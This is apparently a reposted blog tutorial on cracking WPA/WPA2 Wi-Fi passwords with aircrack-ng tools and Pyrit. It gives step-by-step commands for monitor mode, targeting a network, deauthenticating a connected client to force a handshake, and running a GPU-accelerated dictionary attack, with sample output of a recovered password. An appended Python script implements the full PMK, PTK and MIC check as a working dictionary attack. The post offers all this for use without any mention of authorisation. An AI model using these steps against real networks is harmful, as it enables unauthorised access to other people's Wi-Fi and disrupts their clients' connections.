
How to Bruteforce WPA/WPA2 with Pyrit (Tutorial)

2016-03-22 11:47, 309 views
In this tutorial you will learn how to bruteforce WPA/WPA2. Bruteforcing a password is very difficult and takes a lot of time: although the process is possible in principle, cracking a WPA password by exhaustive bruteforce is, in one word,
IMPOSSIBLE. But why?

Let's start with the basics. Say you are trying to bruteforce a password of 3 characters drawn from A-Z at an average speed of 1000 passwords per second: the whole keyspace (26^3 = 17,576 candidates) takes less than a minute. The problem is that WPA passwords
are at least 8 characters long, so let's look at the numbers (26^n candidates at 1000 per second):

4 Characters: 8 minutes
5 Characters: 4 hours
6 Characters: 4 days
7 Characters: 3 months (still doable)
8 Characters: 7 years =)
Funny, right? Yes, 7 years to crack one password, and that is for a 26-letter alphabet; mixing in lowercase, digits and symbols makes it far worse. Unless your life depends on it, just give up and get on with your life! You can check this here.

We can accelerate the process!

Yes, of course we can. We can do this on Backtrack by installing the latest driver for your graphics card,
OpenCL or CUDA (depending on your graphics card brand), and Pyrit. Pyrit lets us use the power of the graphics card to crack the password; it's like aircrack with a turbo. In my case, using a laptop with a Radeon HD 6850M 1 GB,
I could reach 30,000 passwords per second, 30 times more than with aircrack. And don't be surprised: there are beasts out there that reach 100,000 passwords per second. Those rates are PMK computations: each candidate costs 4096 rounds of PBKDF2-HMAC-SHA1, which is what makes WPA cracking slow in the first place. Note that a 30x speed-up only turns 7 years into a few months for the 8-letter case and does nothing about the exponential growth; every extra character or larger alphabet eats the gain back, which is why the rest of this tutorial uses a dictionary rather than exhaustive search.

Installing everything needed to use Pyrit is a little complicated, and I will try to write an installation guide some day.

So you have Backtrack? Drivers? Pyrit? Want to try it just out of curiosity?

How To Bruteforce WPA/WPA2 Tutorial With Backtrack and Pyrit

What you will need:

Backtrack / Kali
Proper graphics card drivers
OpenCL / CUDA
Pyrit
1. First we need to put your wireless card into monitor mode (older aircrack-ng versions create an interface called mon0, newer ones wlan0mon; use whichever name airmon-ng prints, the commands below use mon0):
airmon-ng start wlan0

2. Then run airodump-ng to list all wireless networks in range:
airodump-ng mon0

3. Now we pick our target and copy its details (ESSID, BSSID and channel). Once you have them, close airodump-ng and run it again against the target only. The -w option sets the capture file prefix; using the ESSID makes the file easy to find, since airodump-ng writes it as (ESSID HERE)-01.cap:
airodump-ng --bssid (BSSID HERE) -c (CHANNEL NUMBER) -w (ESSID HERE) mon0

4. Now you can wait for a handshake, or force one if a client is already connected: deauthenticate it so it reconnects and performs the 4-way handshake again. -0 10 sends 10 deauthentication frames; airodump-ng shows "WPA handshake: (BSSID)" in its top line once it has captured one:
aireplay-ng -0 10 -a (BSSID HERE) -c (MAC ADDRESS OF THE CONNECTED CLIENT) mon0

5. Once you have the handshake, close airodump-ng, open a new terminal and check the capture with pyrit:
pyrit -r (HANDSHAKE NAME HERE).cap analyze

Now you should see something like this, indicating a Handshake has been found on the file you analyzed:
Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+

Parsing file 'wpapsk-linksys.dump.gz' (1/1)...
587 packets (587 802.11-packets), 1 APs

#1: AccessPoint 00:0b:86:c2:a4:85 ('linksys')
  #0: Station 00:13:ce:55:98:ef, handshake found
  #1: Station 01:00:5e:7f:ff:fa
  #2: Station 01:00:5e:00:00:16

6. Great! Now you can proceed to reveal the password. Before we go on, you should know that pyrit has some important features. One of them is that you can import many dictionaries into its database, so you can build one very big password list and reuse it against
any handshake you capture. Let's do it! Write:

pyrit eval

7. This shows how many passwords are in the database. As you can see, there are currently none. Let's import some:

pyrit -i (DICTIONARY NAME).(FORMAT HERE) import_passwords

Remember that the extension may vary; many dictionaries are plain .txt files, for example. Write the name and the extension correctly! Pyrit only keeps entries that can actually be WPA passphrases (8 to 63 characters), so the stored count can be lower than the number of lines in the file.
Pyrit now reads the file into the database:
Connecting to storage at 'file://'...  connected.
10202 lines read. Flushing buffers...
All done.

8. Now we have to create an ESSID. Pyrit needs the name of the network you are attacking because the ESSID is the salt in WPA's key derivation: a PMK computed for "linksys" is useless against any other network name. Write the ESSID of your target:
pyrit -e linksys create_essid

Run "pyrit eval" to see the status. The password count and the ESSID now both appear. Perfect!
9. Now we batch-process the database. This precomputes the PMK (the expensive 4096-round PBKDF2 step) for every password/ESSID pair and stores it, so the attack itself only has to do the cheap PTK and MIC check; that is why attack_db below reports over a million PMKs per second instead of tens of thousands. The precomputed PMKs are only reusable against networks with exactly the same ESSID.
pyrit batch

Attacking the Handshake with the Pyrit Database

pyrit -r (handshakename).cap attack_db


Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+

Connecting to storage at 'file://'...  connected.
Parsing file 'wpapsk-linksys.dump.gz' (1/1)...
587 packets (587 802.11-packets), 1 APs

Picked AccessPoint 00:0b:86:c2:a4:85 ('linksys') automatically.
Attacking handshake with Station 00:13:ce:55:98:ef...
Tried 1639 PMKs so far (39.8%); 1577435 PMKs per second.

The password is 'dictionary'.
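As an added example, not from the original post or from Pyrit itself, the following Python reproduces the arithmetic behind the output above: the PMK derivation that "pyrit batch" precomputes, the PTK and MIC check that attack_db runs per candidate, and a constructed message-2 handshake standing in for the airodump-ng capture (all MAC addresses, nonces and the wordlist are made up). It goes slightly beyond the page by enforcing the 8..63 character rule and handling both key descriptor versions (WPA/TKIP uses HMAC-MD5 for the MIC, WPA2/CCMP HMAC-SHA1).

```python
import hashlib
import hmac
import os
import struct
from typing import Iterable, Optional

PBKDF2_ROUNDS = 4096   # fixed by the WPA/WPA2 standard; this loop is what makes every guess expensive
MIC_OFFSET = 81        # byte offset of the 16-byte Key MIC in an EAPOL-Key frame (4-byte EAPOL header + 77)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes). The ESSID is the salt,
    which is why pyrit precomputes PMKs per ESSID (create_essid + batch)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), PBKDF2_ROUNDS, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512(PMK, "Pairwise key expansion", min(MACs) || max(MACs) || min(nonces) || max(nonces)).
    Returns 64 bytes: KCK (16) | KEK (16) | TK (32); only the KCK is needed to verify the MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):   # four 20-byte HMAC-SHA1 outputs cover the 64 bytes needed
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes, version: int = 2) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed. Key descriptor version 1 (WPA/TKIP)
    uses HMAC-MD5, version 2 (WPA2/CCMP) HMAC-SHA1; both are truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]


def build_eapol_msg2(snonce: bytes, version: int = 2) -> bytes:
    """Minimal EAPOL-Key message 2 of the 4-way handshake with a zeroed MIC field (IEEE 802.11i layout)."""
    key_info = 0x0108 | version                       # Pairwise (0x0008) | MIC present (0x0100) | version
    body = (b"\x02"                                   # descriptor type 2 = RSN
            + struct.pack(">HHQ", key_info, 0, 1)     # key info, key length (0 in msg 2), replay counter
            + snonce                                  # 32-byte SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # key IV, key RSC, key ID
            + b"\x00" * 16                            # key MIC, filled in after it is computed
            + struct.pack(">H", 0))                   # key data length (RSN IE omitted in this toy frame)
    return b"\x01\x03" + struct.pack(">H", len(body)) + body   # EAPOL version 1, type 3 = EAPOL-Key


def simulate_handshake(passphrase: str, ssid: str, version: int = 2) -> dict:
    """Stand-in for the airodump-ng capture (constructed data): the station side computes a genuine MIC.
    MACs and nonces are random here; a real attack reads them out of the .cap file."""
    ap_mac, sta_mac = os.urandom(6), os.urandom(6)
    anonce, snonce = os.urandom(32), os.urandom(32)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    frame = build_eapol_msg2(snonce, version)
    frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame, version) + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "eapol": frame, "version": version}


def attack(hs: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: PBKDF2 + PRF + MIC per candidate, the work pyrit does in attack_db
    (with the PBKDF2 part already done by 'pyrit batch'). Returns the matching passphrase or None."""
    snonce = hs["eapol"][17:49]                       # message 2 carries the SNonce in its nonce field
    captured_mic = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:             # WPA passphrases are 8..63 characters; skip the rest
            continue
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["version"]), captured_mic):
            return candidate
    return None


WORDLIST = ["password", "short", "linksys1", "dictionary", "letmein123"]   # constructed sample wordlist

if __name__ == "__main__":
    captured = simulate_handshake("dictionary", "linksys")
    print("The password is %r." % attack(captured, WORDLIST))
```

The PMK derivation can be checked against the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE" gives a PMK starting f42c6fc5...). Everything after the PMK is cheap, which is exactly the split pyrit exploits: batch pays the PBKDF2 cost once per ESSID and attack_db only runs the PRF and MIC comparison.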

I hope this tutorial was useful! If you have any questions, suggestions or comments, feel free to comment below!
Thanks and have fun!
https://richardleo.wordpress.com/2014/02/04/how-to-bruteforce-wpawpa2-pyrit-tutorial/